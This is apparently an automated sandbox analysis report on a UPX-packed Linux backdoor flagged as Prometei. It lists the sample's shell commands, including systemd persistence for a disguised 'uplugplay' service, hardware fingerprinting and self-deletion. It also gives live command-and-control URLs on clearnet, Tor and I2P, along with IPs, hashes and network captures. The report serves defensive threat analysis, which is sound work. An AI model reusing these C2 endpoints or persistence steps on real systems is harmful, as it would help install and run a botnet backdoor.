Source: /tmp/nRlZAbNdJx (PID: 5296)Shell command executed: sh -c "pidof nRlZAbNdJx"Jump to behavior
Source: /tmp/nRlZAbNdJx (PID: 5300)Shell command executed: sh -c "pgrep uplugplay"Jump to behavior
Source: /tmp/nRlZAbNdJx (PID: 5306)Shell command executed: sh -c "pidof uplugplay"Jump to behavior
Source: /tmp/nRlZAbNdJx (PID: 5310)Shell command executed: sh -c "pgrep upnpsetup"Jump to behavior
Source: /tmp/nRlZAbNdJx (PID: 5314)Shell command executed: sh -c "pidof upnpsetup"Jump to behavior
Source: /tmp/nRlZAbNdJx (PID: 5316)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/nRlZAbNdJx (PID: 5332)Shell command executed: sh -c "systemctl enable uplugplay.service"Jump to behavior
Source: /tmp/nRlZAbNdJx (PID: 5340)Shell command executed: sh -c "systemctl start uplugplay.service"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5355)Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5388)Shell command executed: sh -c "cat /proc/cpuinfo"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5392)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5396)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5400)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5404)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5408)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5412)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5416)Shell command executed: sh -c dmidecodeJump to behavior
Source: /usr/sbin/uplugplay (PID: 5420)Shell command executed: sh -c "cat /etc/os-release"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5424)Shell command executed: sh -c uptimeJump to behavior
Source: /usr/sbin/uplugplay (PID: 5428)Shell command executed: sh -c "uname -a"Jump to behavior
Source: /usr/bin/dash (PID: 5363)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.09wTQqP0ri /tmp/tmp.Elrt5dWRAb /tmp/tmp.bCH853YTmbJump to behavior
Source: /bin/sh (PID: 5293)Pgrep executable: /usr/bin/pgrep -> pgrep nRlZAbNdJxJump to behavior
Source: /bin/sh (PID: 5301)Pgrep executable: /usr/bin/pgrep -> pgrep uplugplayJump to behavior
Source: /bin/sh (PID: 5311)Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetupJump to behavior
Source: submitted sampleStderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/nRlZAbNdJx (PID: 5289)File: /usr/sbin/uplugplayJump to dropped file
Source: /tmp/nRlZAbNdJx (PID: 5289)File: /tmp/nRlZAbNdJxJump to behavior
Source: /usr/bin/pgrep (PID: 5293)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5301)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/sbin/uplugplay (PID: 5356)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/uptime (PID: 5425)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /tmp/nRlZAbNdJx (PID: 5289)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5344)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5356)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/uname (PID: 5429)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/cat (PID: 5389)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
Source: /bin/sh (PID: 5429)Uname executable: /usr/bin/uname -> uname -aJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Scripting
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
File and Directory Permissions Modification
LSASS Memory4
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Scripting
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
File Deletion
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits1
Proxy
Manipulate Device CommunicationManipulate App Store Rankings or Ratings
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 559902 Sample: nRlZAbNdJx Startdate: 26/01/2022 Architecture: LINUX Score: 64 76 p3.feefreepool.net 88.198.246.242, 40418, 44444, 56830 HETZNER-ASDE Germany 2->76 78 109.202.202.202, 80 INIT7CH Switzerland 2->78 80 3 other IPs or domains 2->80 82 Multi AV Scanner detection for submitted file 2->82 84 Found Tor onion address 2->84 86 Sample is packed with UPX 2->86 11 logrotate sh nRlZAbNdJx 2->11         started        15 systemd uplugplay 2->15         started        17 dash ls 2->17         started        19 5 other processes 2->19 signatures3 process4 file5 72 /usr/sbin/uplugplay, ELF 11->72 dropped 88 Drops files in suspicious directories 11->88 90 Sample deletes itself 11->90 21 sh rsyslog-rotate 11->21         started        23 nRlZAbNdJx sh 11->23         started        25 nRlZAbNdJx sh 11->25         started        29 7 other processes 11->29 27 uplugplay 15->27         started        signatures6 process7 process8 31 rsyslog-rotate systemctl 21->31         started        33 sh pgrep 23->33         started        35 sh pidof 25->35         started        37 uplugplay sh 27->37         started        39 sh pgrep 29->39         started        41 sh pidof 29->41         started        43 sh pgrep 29->43         started        45 4 other processes 29->45 process9 47 sh uplugplay 37->47         started        file10 74 /etc/CommId, ASCII 47->74 dropped 50 uplugplay sh 47->50         started        52 uplugplay sh 47->52         started        54 uplugplay sh 47->54         started        56 8 other processes 47->56 process11 process12 58 sh cat 50->58         started        60 sh dmidecode 52->60         started        62 sh dmidecode 54->62         started        64 sh dmidecode 56->64         started        66 sh dmidecode 56->66         started        68 sh dmidecode 56->68         started        70 5 other processes 56->70
SourceDetectionScannerLabelLink
nRlZAbNdJx15%VirustotalBrowse
nRlZAbNdJx26%ReversingLabsLinux.Backdoor.Prometei
SourceDetectionScannerLabelLink
/usr/sbin/uplugplay26%ReversingLabsLinux.Backdoor.Prometei
No Antivirus matches
SourceDetectionScannerLabelLink
http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rg0%Avira URL Cloudsafe
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
http://p3.feefreepool.net/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
http://dummy.zero/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=53&i=5HNN7ZK1006GY32G0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
p3.feefreepool.net
88.198.246.242
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=53&i=5HNN7ZK1006GY32Gfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgnRlZAbNdJx, 5289.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://upx.sf.netnRlZAbNdJx, uplugplay.22.drfalse
      high
      http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cginRlZAbNdJx, 5289.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://p3.feefreepool.net/cgi-bin/prometei.cginRlZAbNdJx, 5289.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cginRlZAbNdJx, 5289.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://dummy.zero/cgi-bin/prometei.cginRlZAbNdJx, 5289.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      88.198.246.242
      p3.feefreepool.netGermany
      24940HETZNER-ASDEtrue
      54.171.230.55
      unknownUnited States
      16509AMAZON-02USfalse
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      88.198.246.242lHxDIlc6HUGet hashmaliciousBrowse
      • p3.feefreepool.net/cgi-bin/prometei.cgi?r=66&i=V9PV9LOR9Q54LN8Z
      PMidZ9jAKZGet hashmaliciousBrowse
      • p3.feefreepool.net/cgi-bin/prometei.cgi?r=58&i=7B1B0KLF45MTZ528
      zsvc.exeGet hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271
      3V9alTXIliGet hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=MKWJIGBKXJXI0948
      promet16Get hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=0X81G723HYG17S60
      promet15Get hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=6214X121I3A61W1S
      promet2Get hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=MU2G1NCM0HDF3L2N
      EKbGofM1r6Get hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=ENEP5O05YTLM46K2
      54.171.230.55PMidZ9jAKZGet hashmaliciousBrowse
        cemtopGet hashmaliciousBrowse
          qtmzbnGet hashmaliciousBrowse
            arm5Get hashmaliciousBrowse
              arm7Get hashmaliciousBrowse
                sh4Get hashmaliciousBrowse
                  beamer.arm6-20220125-0751Get hashmaliciousBrowse
                    6kJbNo1Qa2Get hashmaliciousBrowse
                      garm7Get hashmaliciousBrowse
                        gyyrqb9nbfGet hashmaliciousBrowse
                          KzdybjRQ1OGet hashmaliciousBrowse
                            MGvp9MsVtQGet hashmaliciousBrowse
                              gummy.arm7Get hashmaliciousBrowse
                                lEYJGT0bsMGet hashmaliciousBrowse
                                  gummy.ppcGet hashmaliciousBrowse
                                    gummy.sparcGet hashmaliciousBrowse
                                      a-r.m-4.SakuraGet hashmaliciousBrowse
                                        iGYPh4vrTOGet hashmaliciousBrowse
                                          wnjgVDfa0gGet hashmaliciousBrowse
                                            armGet hashmaliciousBrowse
                                              109.202.202.202lHxDIlc6HUGet hashmaliciousBrowse
                                                PMidZ9jAKZGet hashmaliciousBrowse
                                                  atxhuaGet hashmaliciousBrowse
                                                    cemtopGet hashmaliciousBrowse
                                                      earyzqGet hashmaliciousBrowse
                                                        fwdfvfGet hashmaliciousBrowse
                                                          lnkfmxGet hashmaliciousBrowse
                                                            nvitpjGet hashmaliciousBrowse
                                                              qtmzbnGet hashmaliciousBrowse
                                                                qvmxvlGet hashmaliciousBrowse
                                                                  razdznGet hashmaliciousBrowse
                                                                    vtyhatGet hashmaliciousBrowse
                                                                      vvglmaGet hashmaliciousBrowse
                                                                        arcGet hashmaliciousBrowse
                                                                          armGet hashmaliciousBrowse
                                                                            arm5Get hashmaliciousBrowse
                                                                              arm6Get hashmaliciousBrowse
                                                                                arm7Get hashmaliciousBrowse
                                                                                  i586Get hashmaliciousBrowse
                                                                                    i686Get hashmaliciousBrowse
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      p3.feefreepool.netlHxDIlc6HUGet hashmaliciousBrowse
                                                                                      • 88.198.246.242
                                                                                      PMidZ9jAKZGet hashmaliciousBrowse
                                                                                      • 88.198.246.242
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      HETZNER-ASDE34jU7VJQ0aGet hashmaliciousBrowse
                                                                                      • 95.217.66.132
                                                                                      F40PptOwCO.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      lHxDIlc6HUGet hashmaliciousBrowse
                                                                                      • 88.198.246.242
                                                                                      PMidZ9jAKZGet hashmaliciousBrowse
                                                                                      • 88.198.246.242
                                                                                      FedEx Package.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      8sQIwmykhK.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      Loader.exeGet hashmaliciousBrowse
                                                                                      • 136.243.172.101
                                                                                      8q29ccl9udkb.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      zyxd7AEkBbQoGfYYyWw.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      MeA7.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      04KvoWMm7A.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      oIti9XVnG.dllGet hashmaliciousBrowse
                                                                                      • 178.63.25.185
                                                                                      gAT2Oj3OTz.exeGet hashmaliciousBrowse
                                                                                      • 148.251.234.83
                                                                                      gAT2Oj3OTz.exeGet hashmaliciousBrowse
                                                                                      • 148.251.234.83
                                                                                      8yFmOmFwxN.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      dC8gRk0W3u.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      foc invoices.xlsxGet hashmaliciousBrowse
                                                                                      • 135.181.8.218
                                                                                      hCOTbOPn1b.dllGet hashmaliciousBrowse
                                                                                      • 178.63.25.185
                                                                                      9X3HSjWQkE.dllGet hashmaliciousBrowse
                                                                                      • 178.63.25.185
                                                                                      Mv16xwmzLS.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      AMAZON-02US34jU7VJQ0aGet hashmaliciousBrowse
                                                                                      • 52.89.144.94
                                                                                      PMidZ9jAKZGet hashmaliciousBrowse
                                                                                      • 54.171.230.55
                                                                                      FAX-ET_REMIT103INV364783-PDF.htmGet hashmaliciousBrowse
                                                                                      • 52.29.0.64
                                                                                      cemtopGet hashmaliciousBrowse
                                                                                      • 54.171.230.55
                                                                                      qtmzbnGet hashmaliciousBrowse
                                                                                      • 54.171.230.55
                                                                                      razdznGet hashmaliciousBrowse
                                                                                      • 34.249.145.219
                                                                                      arm5Get hashmaliciousBrowse
                                                                                      • 54.171.230.55
                                                                                      SNO22 595406_RACX-159814.exeGet hashmaliciousBrowse
                                                                                      • 52.217.169.125
                                                                                      arm7Get hashmaliciousBrowse
                                                                                      • 54.171.230.55
                                                                                      30WT4nTbpv.exeGet hashmaliciousBrowse
                                                                                      • 44.227.76.166
                                                                                      E48V1NL0GX.exeGet hashmaliciousBrowse
                                                                                      • 54.71.30.209
                                                                                      3wpfooP5Io.exeGet hashmaliciousBrowse
                                                                                      • 52.89.53.122
                                                                                      QUOTATION REQUEST - SUPPLY OF PRODUCTS - DTD JANUARY 2022PDF.xlsxGet hashmaliciousBrowse
                                                                                      • 52.89.53.122
                                                                                      sh4Get hashmaliciousBrowse
                                                                                      • 54.171.230.55
                                                                                      c856f08_2113smart.xlsxGet hashmaliciousBrowse
                                                                                      • 176.34.241.253
                                                                                      vsl_rfq01209800122.exeGet hashmaliciousBrowse
                                                                                      • 3.64.163.50
                                                                                      501000004751.exeGet hashmaliciousBrowse
                                                                                      • 18.159.59.253
                                                                                      Proforma Invoice.docxGet hashmaliciousBrowse
                                                                                      • 13.225.39.127
                                                                                      DHLAWB9678547836.exeGet hashmaliciousBrowse
                                                                                      • 3.64.163.50
                                                                                      beamer.arm6-20220125-0751Get hashmaliciousBrowse
                                                                                      • 54.171.230.55
                                                                                      No context
                                                                                      No context
                                                                                      Process:/usr/sbin/uplugplay
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):16
                                                                                      Entropy (8bit):3.625
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:mzUzWy:yi3
                                                                                      MD5:865FF596C56A2134E34C44A6220A0E7D
                                                                                      SHA1:B6AB44FDFEDC0BA0DE52D88CAD73A5074BBB1A13
                                                                                      SHA-256:E46BCDA7B72E0E2C81FA50382CBC2121530E739BC8AF346C3E668B1469FE7A7D
                                                                                      SHA-512:37BD6FCF6E2476A42B60A5F46E002119772BCD8533F39B217A25DBEB082844DE10E59CDA03C2592613D88AAAB9E3E3DE9DB7EB0E7E666E9832C6D36C93DE61D2
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:5HNN7ZK1006GY32G
                                                                                      Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):76
                                                                                      Entropy (8bit):3.7627880354948586
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                      MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                      SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                      SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                      SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                      Process:/tmp/nRlZAbNdJx
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):145
                                                                                      Entropy (8bit):4.769509838572339
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
                                                                                      MD5:8CA62D1F47880BCE036C2956C9B7B272
                                                                                      SHA1:3BCC3A5C4FCC5B0D08C4524A59F6B8E113B62060
                                                                                      SHA-256:C655D3D4E374FAD38313EC4262207B2D7D68A870238F203EF3C33F85E66C8E32
                                                                                      SHA-512:4CD2D9D67151FA25E833707DEE2442C4A5F752053FC2C36EC73C0E2B734C66CA69C63FCEB47714D9ADD5B9FE2EEE1E45BE5199E2CAE7C26173E766B333877DA6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:[Unit].Description=UPlugPlay.After=multi-user.target..[Service].Type=forking.ExecStart=/usr/sbin/uplugplay..[Install].WantedBy=multi-user.target.
                                                                                      Process:/tmp/nRlZAbNdJx
                                                                                      File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                                                      Category:dropped
                                                                                      Size (bytes):426571
                                                                                      Entropy (8bit):7.942144296073735
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:vuUGbSUQf6LndsBl8c7Imd7Bb7PfZwZfYEmvozMy+:vuuujdCr7X57HZwVEoG
                                                                                      MD5:C3E9E5145FAD7C4D161F68F822662519
                                                                                      SHA1:B0C4BD227FCEFCAD1C250738A9D027865B238650
                                                                                      SHA-256:EE3D72CBB8EDE3949A5CB0C5B708087FC482254CC80DD7745BE277DD2B5BA122
                                                                                      SHA-512:8C44112B60595604F8BF2DF9BB72A87CD9DFEC426D0A72ABC976D74B9E658F97D989257A010801DD971A318A47A8B6D80955C90AB29E84A148C5800D7323638B
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: SUSP_ELF_LNX_UPX_Compressed_File, Description: Detects a suspicious ELF binary with UPX compression, Source: /usr/sbin/uplugplay, Author: Florian Roth
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 26%
                                                                                      Reputation:low
                                                                                      Preview:.ELF..............>......pF.....@...................@.8...@.......................@.......@......y.......y................................F.......F.............................Q.td....................................................k&1FUPX!$........(...(..p............. ..ELF......>....@........ .'8..........W.3c..-.......o..K>...@Q....obo...N...|...o...={...-.Q.`XO...m..o..p..@.... ....on.....D_D..uK...O._.m(.S.tdO..n.Qn....s;.oRO.....0...*I.$.P.............y......GNU....'..l......?...y1qN...v.r=Q...!`X.,........_....Q.%.yr...SM./P..^...p.D.....BF.0.....]....K........y.../..p........LG...._...#/v..._P.C2.b.`...y!#...x0...@p..d.L.h..`r!#/..X...vP_./H....@?.TM"8..8.0O...`(...q.\. ..O.$ar .@%I.Q....]...I-.n.......H...H...H..t..."...9.....?..%......D................................}....ume....]U....ME=....5-%..................-..E.t$..T$.<{....%.....H.|$.....9.g...Sd2.OH.. ......kn(...$. 1.H9.`K..t>d....4..u......>2..w..H.. -U.H.=$...o....... ......=.._w.Ru6...k....N.y.
                                                                                      File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                                                      Entropy (8bit):7.942144296073735
                                                                                      TrID:
                                                                                      • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                      • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                      File name:nRlZAbNdJx
                                                                                      File size:426571
                                                                                      MD5:c3e9e5145fad7c4d161f68f822662519
                                                                                      SHA1:b0c4bd227fcefcad1c250738a9d027865b238650
                                                                                      SHA256:ee3d72cbb8ede3949a5cb0c5b708087fc482254cc80dd7745be277dd2b5ba122
                                                                                      SHA512:8c44112b60595604f8bf2df9bb72a87cd9dfec426d0a72abc976d74b9e658f97d989257a010801dd971a318a47a8b6d80955c90ab29e84a148c5800d7323638b
                                                                                      SSDEEP:12288:vuUGbSUQf6LndsBl8c7Imd7Bb7PfZwZfYEmvozMy+:vuuujdCr7X57HZwVEoG
                                                                                      File Content Preview:.ELF..............>......pF.....@...................@.8...@.......................@.......@......y.......y................................F.......F.............................Q.td....................................................k&1FUPX!$........(...(.

                                                                                      ELF header

                                                                                      Class:ELF64
                                                                                      Data:2's complement, little endian
                                                                                      Version:1 (current)
                                                                                      Machine:Advanced Micro Devices X86-64
                                                                                      Version Number:0x1
                                                                                      Type:EXEC (Executable file)
                                                                                      OS/ABI:UNIX - System V
                                                                                      ABI Version:0
                                                                                      Entry Point Address:0x467088
                                                                                      Flags:0x0
                                                                                      ELF Header Size:64
                                                                                      Program Header Offset:64
                                                                                      Program Header Size:56
                                                                                      Number of Program Headers:3
                                                                                      Section Header Offset:0
                                                                                      Section Header Size:64
                                                                                      Number of Section Headers:0
                                                                                      Header String Table Index:0
                                                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                      LOAD0x00x4000000x4000000x679a30x679a34.33740x5R E0x1000
                                                                                      LOAD0x00x4680000x4680000x00xe1d4980.00000x6RW 0x1000
                                                                                      GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 26, 2022 00:22:21.011615038 CET4251680192.168.2.23109.202.202.202
                                                                                      Jan 26, 2022 00:22:36.115427971 CET43928443192.168.2.2391.189.91.42
                                                                                      Jan 26, 2022 00:22:37.737734079 CET5683080192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:37.759582996 CET805683088.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:22:37.759675026 CET5683080192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:37.772116899 CET5683080192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:37.845103979 CET805683088.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:22:44.841204882 CET33608443192.168.2.2354.171.230.55
                                                                                      Jan 26, 2022 00:22:46.355292082 CET42836443192.168.2.2391.189.91.43
                                                                                      Jan 26, 2022 00:22:50.014096975 CET805683088.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:22:50.014317036 CET5683080192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:50.014589071 CET805683088.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:22:50.015180111 CET5683080192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:50.038091898 CET805683088.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:22:50.451529026 CET4251680192.168.2.23109.202.202.202
                                                                                      Jan 26, 2022 00:22:52.213104963 CET5683280192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:52.236972094 CET805683288.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:22:52.237101078 CET5683280192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:52.238411903 CET5683280192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:52.313450098 CET805683288.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:22:54.547105074 CET33608443192.168.2.2354.171.230.55
                                                                                      Jan 26, 2022 00:22:54.599658012 CET4433360854.171.230.55192.168.2.23
                                                                                      Jan 26, 2022 00:22:57.764869928 CET805683288.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:22:57.764916897 CET805683288.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:22:57.765217066 CET5683280192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:57.766136885 CET5683280192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:57.788425922 CET805683288.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:23:17.074904919 CET43928443192.168.2.2391.189.91.42
                                                                                      Jan 26, 2022 00:23:37.554610968 CET42836443192.168.2.2391.189.91.43
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 26, 2022 00:22:37.718264103 CET5963253192.168.2.238.8.8.8
                                                                                      Jan 26, 2022 00:22:37.737603903 CET53596328.8.8.8192.168.2.23
                                                                                      Jan 26, 2022 00:22:39.153480053 CET4041880192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:39.174834013 CET804041888.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:22:43.175144911 CET4041880192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:43.472532034 CET4041880192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:22:52.193232059 CET5888253192.168.2.238.8.8.8
                                                                                      Jan 26, 2022 00:22:52.212853909 CET53588828.8.8.8192.168.2.23
                                                                                      Jan 26, 2022 00:24:45.445951939 CET4444480192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:24:45.469412088 CET804444488.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:24:49.469899893 CET4444480192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:24:49.678631067 CET4444480192.168.2.2388.198.246.242
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Jan 26, 2022 00:22:37.718264103 CET192.168.2.238.8.8.80x14ecStandard query (0)p3.feefreepool.netA (IP address)IN (0x0001)
                                                                                      Jan 26, 2022 00:22:52.193232059 CET192.168.2.238.8.8.80x14ecStandard query (0)p3.feefreepool.netA (IP address)IN (0x0001)
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Jan 26, 2022 00:22:37.737603903 CET8.8.8.8192.168.2.230x14ecNo error (0)p3.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
                                                                                      Jan 26, 2022 00:22:52.212853909 CET8.8.8.8192.168.2.230x14ecNo error (0)p3.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
                                                                                      • p3.feefreepool.net
                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                      0192.168.2.235683088.198.246.24280
